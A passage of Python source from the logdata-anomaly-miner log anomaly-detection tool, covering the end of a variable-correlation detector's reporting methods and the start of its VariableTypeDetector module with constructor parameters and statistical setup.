self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][ i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j=j_val -> Var i=i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres: sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], [[i_val, pos_var_cor_val[1][j_val][i_val]] for i_val in pos_var_cor_val[1][j_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_values.append(repr(j_val)) affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][ i_val]] for i_val in pos_var_cor_val[1][j_val].keys()]) if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedLogAtomValues"] = affected_log_atom_values sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def print_ini_w_rel(self, event_index): """Print the generated correlations for the method "weighted relations".""" message = f"Initialisation of the method weighted relations of the event {self.event_type_detector.get_event_type(event_index)}" message += "\n%s rules have been generated for this event type" % ( sum(len([i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) > 0 and sum(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}]) + sum( len([j_val for j_val in pos_var_cor_val[1] if len(pos_var_cor_val[1][j_val]) > 0 and sum( pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}])) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i = i_val -> Var j = j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[0][i_val].values()) sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val),)) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[ 0][i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j = j_val -> Var i = i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[1][j_val].values()) sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], [[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[1][j_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_values.append(repr(j_val)) affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[ 1][j_val].keys()]) if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedLogAtomValues"] = affected_log_atom_values sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def print_failed_wrel_test(self, event_index, pos_var_cor_index, cor_direction, value1): """Print the correlations which failed in a test step for the method "weighted relations".""" cor_direction_neg = 0 if cor_direction == 0: cor_direction_neg = 1 message = "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]], repr(value1), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]], [[value2, self.w_rel_list[event_index][ pos_var_cor_index][cor_direction][value1][value2] / sum(self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].values())] for value2 in self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].keys()], self.event_type_detector.total_records) confidence = sum(self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) / len( self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]]) affected_values.append(repr(value1)) affected_values.append([[value2, self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1][value2] / sum( self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1].values())] for value2 in self.w_rel_list[ event_index][pos_var_cor_index][cor_direction][value1].keys()]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines = [""] * self.event_type_detector.total_records for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def print_failed_wrel_update(self, event_index, pos_var_cor_index, cor_direction, value1): """Print the correlations which failed in an update step for the method "weighted relations".""" cor_direction_neg = 0 if cor_direction == 0: cor_direction_neg = 1 message = "Correlation of the target_path_list %s = %s -> %s = %s has been rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]], repr(value1), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]], [[value2, self.w_rel_list[event_index][ pos_var_cor_index][cor_direction][value1][value2] / sum(self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].values())] for value2 in self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].keys()], self.event_type_detector.total_records) confidence = sum(self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) / len( self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]]) affected_values.append(repr(value1)) affected_values.append([[value2, self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1][value2] / sum( self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1].values())] for value2 in self.w_rel_list[ event_index][pos_var_cor_index][cor_direction][value1].keys()]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines = [""] * self.event_type_detector.total_records for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def bt_min_successes(self, num_BT, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_BT is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_BT) i_factorial = 1 for i in range(num_BT + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_BT - i)) * ((1-p) ** i) * (p ** ( num_BT - i)) if tmp_sum > alpha: return num_BT-i return 0 VariableTypeDetector.py000066400000000000000000004557221500476301700354210ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for variable type. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import numpy as np import copy from scipy.stats import kstest, ks_2samp, norm, multinomial, distributions, chisquare import os import logging import sys import math from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil import aminer.analysis.VTDData as VTDData class VariableTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class tests each variable of the event_types for the implemented variable types. This module needs to run after the event type detector is initialized """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, used_gof_test='CM', gof_alpha=0.05, s_gof_alpha=0.05, s_gof_bt_alpha=0.05, d_alpha=0.1, d_bt_alpha=0.1, div_thres=0.3, sim_thres=0.1, indicator_thres=0.4, num_init=100, num_update=50, num_update_unq=200, num_s_gof_values=50, num_s_gof_bt=30, num_d_bt=30, num_pause_discrete=5, num_pause_others=2, test_gof_int=True, num_stop_update=False, silence_output_without_confidence=False, silence_output_except_indicator=True, num_var_type_hist_ref=10, num_update_var_type_hist_ref=10, num_var_type_considered_ind=10, num_stat_stop_update=200, num_updates_until_var_reduction=20, var_reduction_thres=0.6, num_skipped_ind_for_weights=1, num_ind_for_weights=100, used_multinomial_test='Chi', use_empiric_distr=True, used_range_test='MinMax', range_alpha=0.05, range_threshold=1, num_reinit_range=100, range_limits_factor=1, dw_alpha=0.05, save_statistics=True, output_logline=True, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are @param used_gof_test states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. @param gof_alpha significance niveau for p-value for the distribution test of the initialization. Recomended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param s_gof_alpha significance niveau for p-value for the sliding KS-test in the update step. Recommended values are the implemented values of crit_val_upd_ks. @param s_gof_bt_alpha significance niveau for the binomial test of the test results of the s_gof-test. @param d_alpha significance niveau for the binomialtest of the single discrete variables. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param d_bt_alpha significance niveau for the binomialtest of the test results of the discrete tests. @param div_thres threshold for diversity of the values of a variable (the higher the more values have to be distinct to be considered to be continuous distributed). @param sim_thres threshold for similarity of the values of a variable (the higher the more values have to be common to be considered discrete). @param indicator_thres threshold for the variable indicators to be used in the event indicator. @param num_init number of lines processed before detecting the variable types. Recommended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param num_update number of values for which the variable type is updated. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param num_update_unq number of values for which the values of type unq is unique (the last num_update + num_update_unq values are unique). @param num_s_gof_values number of values which are tested in the s_gof-test. The value has to be <= num_init, >= num_update. Recommended values are the implemented values of crit_val_upd_ks. @param num_s_gof_bt number of tested s_gof-Tests for the binomialtest of the testresults of the s_gof tests. @param num_d_bt number of tested discrete samples for the binomial test of the test results of the discrete tests. @param num_pause_discrete number of paused updates, before the discrete var type is adapted. @param num_pause_others number of paused update runs, before trying to find a new var_type. @param test_gof_int states if integer number should be tested for the continuous variable type. @param num_stop_update stops updating the found variable types after num_stop_update processed lines. If False the updating of lines will not be stopped. @param silence_output_without_confidence silences the all messages without a confidence-entry. @param silence_output_except_indicator silences the all messages which are not related with the calculated indicator. @param num_var_type_hist_ref states how long the reference for the var_type_hist_ref is. The reference is used in the evaluation. @param num_update_var_type_hist_ref number of update steps before the var_type_hist_ref is being updated. @param num_var_type_considered_ind this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. @param num_stat_stop_update number of static values of a variable, to stop tracking the variable type and read in the ETD. False if not wanted. @param num_updates_until_var_reduction number of update steps until the variables are tested if they are suitable for an indicator. If not suitable, they are removed from the tracking of ETD (reduce checked variables). Equals 0 if disabled. @param var_reduction_thres threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. @param num_skipped_ind_for_weights number of the skipped indicators for the calculation of the indicator weights. @param num_ind_for_weights number of indicators used in the calculation of the indicator weights. @param used_multinomial_test states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi', where 'MT' means original MT, 'Approx' is the approximation with single BTs and 'Chi' is the Chi-square test. @param use_empiric_distr states if empiric distributions of the variables should be used if no continuous distribution is detected. @param used_range_test states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. @param range_alpha significance niveau for the range variable type. @param range_threshold maximal proportional deviation from the range before the variable type is rejected. @param num_reinit_range number of update steps until the range variable type is reinitialized. Set to zero if not desired. @param range_limits_factor factor for the limits of the range variable type. @param dw_alpha significance niveau of the durbin watson test to test serial correlation. If the test fails the type range is assigned to the variable instead of continuous. @param save_statistics used to track the indicators and changed variable types. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, used_gof_test=used_gof_test, gof_alpha=gof_alpha, s_gof_alpha=s_gof_alpha, s_gof_bt_alpha=s_gof_bt_alpha, d_alpha=d_alpha, d_bt_alpha=d_bt_alpha, div_thres=div_thres, sim_thres=sim_thres, indicator_thres=indicator_thres, num_init=num_init, num_update=num_update, num_update_unq=num_update_unq, num_s_gof_values=num_s_gof_values, num_s_gof_bt=num_s_gof_bt, num_d_bt=num_d_bt, num_pause_discrete=num_pause_discrete, num_pause_others=num_pause_others, test_gof_int=test_gof_int, num_stop_update=num_stop_update, silence_output_without_confidence=silence_output_without_confidence, silence_output_except_indicator=silence_output_except_indicator, num_var_type_hist_ref=num_var_type_hist_ref, num_update_var_type_hist_ref=num_update_var_type_hist_ref, num_var_type_considered_ind=num_var_type_considered_ind, num_stat_stop_update=num_stat_stop_update, num_updates_until_var_reduction=num_updates_until_var_reduction, var_reduction_thres=var_reduction_thres, num_skipped_ind_for_weights=num_skipped_ind_for_weights, num_ind_for_weights=num_ind_for_weights, used_multinomial_test=used_multinomial_test, use_empiric_distr=use_empiric_distr, used_range_test=used_range_test, range_alpha=range_alpha, range_threshold=range_threshold, num_reinit_range=num_reinit_range, range_limits_factor=range_limits_factor, dw_alpha=dw_alpha, save_statistics=save_statistics, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not isinstance(self.event_type_detector, EventTypeDetector): msg = "event_type_detector must be an instance of EventTypeDetector." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.used_gof_test not in ("KS", "CM"): msg = "used_gof_test must be either 'KF' or 'CM'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.used_multinomial_test not in ("MT", "Approx", "Chi"): msg = "used_multinomial_test must be either 'MT', 'Approx' or 'Chi'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.used_range_test not in ("MeanSD", "EmpiricQuantiles", "MinMax"): msg = "used_range_test must be either 'MeanSD', 'EmpiricQuantiles' or 'MinMax'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # Initialization of variables, which are no input parameters # Saves the minimal number of successes for the BT for the s_gof-test self.s_gof_bt_min_success = self.bt_min_successes(self.num_s_gof_bt, 1 - self.s_gof_alpha, self.s_gof_bt_alpha) # Saves the minimal number of successes for the BT for discrete values self.d_bt_min_success = self.bt_min_successes(self.num_d_bt, 1 - self.d_alpha, self.d_bt_alpha) # Number of eventTypes self.num_events = 0 # Add the variable_type_detector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List of the numbers of variables of the eventTypes self.length = [] # Used to keep track of the indices of the variables if the target_path_list is not empty self.variable_path_num = [] # List of the found vartypes self.var_type = [] # Stores the alternative distribution types of continuous variables self.alternative_distribution_types = [] # Stores the values the betam and special distributions. The values are needed in the s_gof test self.distr_val = [] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results = [] # List of the history of variable types of the single variables. The lists to the variables take the form # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] self.var_type_history_list = [] # Reference of a var_type_history_list. Used in the calculation of the indicator. self.var_type_history_list_reference = [] # Order of the var_type_history_list [others, static, [discrete, number of appended steps], asc, desc, unique, range, # ev of continuous distributions] self.var_type_history_list_order = ['others', 'stat', 'd', 'asc', 'desc', 'unq', 'range', 'cont'] # List of the distributions for which the s_gof test is implemented self.distr_list = ['nor', 'uni', 'spec', 'beta', 'betam', 'emp'] # List of the numbers of log lines of this eventType, when an indicator failed self.failed_indicators = [] # Stores the standardised values of all tested distributions for better performance. The list is hardcoded below self.quantiles = {} # Stores the number of minimal successes for the BT for selected sample-size and probabilities. self.bt_min_succ_data = {} self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 # Initialize lists used for the tracking of the indicator if self.save_statistics: self.statistics_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, 'statistics') # List of the numbers of total parsed log lines, when an indicator failed. Only used for the statistics self.failed_indicators_total = [] # List of the confidences of the indicators self.failed_indicators_values = [] # List of the paths of the indicators self.failed_indicators_paths = [] # List of the numbers of total parsed log lines, when a variable changed its type. Only used for the statistics self.changed_var_types = [] # Stores the standardised values of all tested distributions for better performance. self.quantiles = VTDData.quantiles if self.used_multinomial_test == 'Approx': # Stores the number of minimal successes for the BT with the stated sample-sizes and probabilities self.bt_min_succ_data = VTDData.bt_min_succ_data # List of the maximal values to the significance niveau 'gof_alpha', the sample-size 'num_init' and the single # distributions in the initial KS-tests self.crit_val_ini_ks = VTDData.crit_val_ini_ks # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' and the single # distributions in the initial CM-tests self.crit_val_ini_cm = VTDData.crit_val_ini_cm # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_ks-tests in the update steps self.crit_val_upd_ks = VTDData.crit_val_upd_ks # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_cm-tests in the update steps self.crit_val_upd_cm = VTDData.crit_val_upd_cm # List of the critical distances to charactersitics of distributions. # These distances are used to prevent adapting too much on an anomalous sample in the gof tests. self.crit_dist_upd_cm = VTDData.crit_dist_upd_cm # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update steps for the CM-homogeneity test self.crit_val_hom_cm = VTDData.crit_val_hom_cm # List of the critical values of the durbin watson test self.crit_val_dw = VTDData.crit_val_dw if self.dw_alpha not in self.crit_val_dw: pos_vals = list(self.crit_val_dw.keys()) nearest = self.crit_val_dw[0] for val in self.crit_val_dw[1:]: if abs(self.dw_alpha - val) < abs(self.dw_alpha - nearest): nearest = val msg = f'Changed the parameter dw_alpha of the VTD from {self.dw_alpha} to {nearest} to use the pregenerated critical values ' \ f'for the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.dw_alpha = nearest if num_init not in self.crit_val_dw[self.dw_alpha]: pos_vals = list(self.crit_val_dw[self.dw_alpha].keys()) nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for ' \ f'the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (gof_alpha not in self.crit_val_ini_ks or gof_alpha not in self.crit_val_upd_ks)) or ( self.used_gof_test == 'CM' and (gof_alpha not in self.crit_val_ini_cm or gof_alpha not in self.crit_val_upd_cm or gof_alpha not in self.crit_val_hom_cm)): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks if val in self.crit_val_upd_ks] else: pos_vals = [val for val in self.crit_val_ini_cm if val in self.crit_val_upd_cm and val in self.crit_val_hom_cm] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(self.gof_alpha - val) < abs(self.gof_alpha - nearest): nearest = val msg = f'Changed the parameter gof_alpha of the VTD from {self.gof_alpha} to {nearest} to use the pregenerated critical ' \ f'values for the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.gof_alpha = nearest if (self.used_gof_test == 'KS' and (num_init not in self.crit_val_ini_ks[self.gof_alpha] or num_init not in self.crit_val_upd_ks[self.gof_alpha])) or ( self.used_gof_test == 'CM' and (num_init not in self.crit_val_ini_cm[self.gof_alpha] or num_init not in self.crit_val_upd_cm[self.gof_alpha] or num_init not in self.crit_val_hom_cm[self.gof_alpha])): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks[self.gof_alpha] if val in self.crit_val_upd_ks[self.gof_alpha]] else: pos_vals = [val for val in self.crit_val_ini_cm[self.gof_alpha] if val in self.crit_val_upd_cm[self.gof_alpha] and val in self.crit_val_hom_cm[self.gof_alpha]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for' \ f' the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (num_s_gof_values not in self.crit_val_upd_ks[self.gof_alpha][self.num_init])) or ( self.used_gof_test == 'CM' and (num_s_gof_values not in self.crit_val_upd_cm[self.gof_alpha][self.num_init] or num_s_gof_values not in self.crit_val_hom_cm[self.gof_alpha][self.num_init])): if self.used_gof_test == 'KS': pos_vals = list(self.crit_val_upd_ks[self.gof_alpha][self.num_init].keys()) else: pos_vals = [val for val in self.crit_val_upd_cm[self.gof_alpha][self.num_init] if val in self.crit_val_hom_cm[self.gof_alpha][self.num_init]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_s_gof_values - val) < abs(num_s_gof_values - nearest): nearest = val msg = f'Changed the parameter num_s_gof_values of the VTD from {num_s_gof_values} to {nearest} to use pregenerated ' \ f'critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_s_gof_values = nearest # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(self.num_init, self.num_update, num_s_gof_values)} to use pregenerated critical values for the VTDs gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(self.num_init, self.num_update, self.num_s_gof_values) + 500} to use pregenerated critical values for the VTDs' \ f' gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) + 500 # Loads the persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() # Generate the modifiers for the estimation of the minimum and maximum for the uniform distribution self.min_mod_ini_uni = 1 / (self.num_init + 1) self.min_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) self.max_mod_ini_uni = 1 / (self.num_init + 1) self.max_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) # Generate the modifiers for the estimation of the minimum and maximum for the beta1 distribution self.min_mod_ini_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta1 = 1 - self.quantiles['beta1'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta1 = 1 - self.quantiles['beta1'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta2 distribution self.min_mod_ini_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta2 = 1-self.quantiles['beta2'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta2 = 1-self.quantiles['beta2'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta4 distribution self.min_mod_ini_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta4 = 1-self.quantiles['beta4'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta4 = 1-self.quantiles['beta4'][min(0.999, 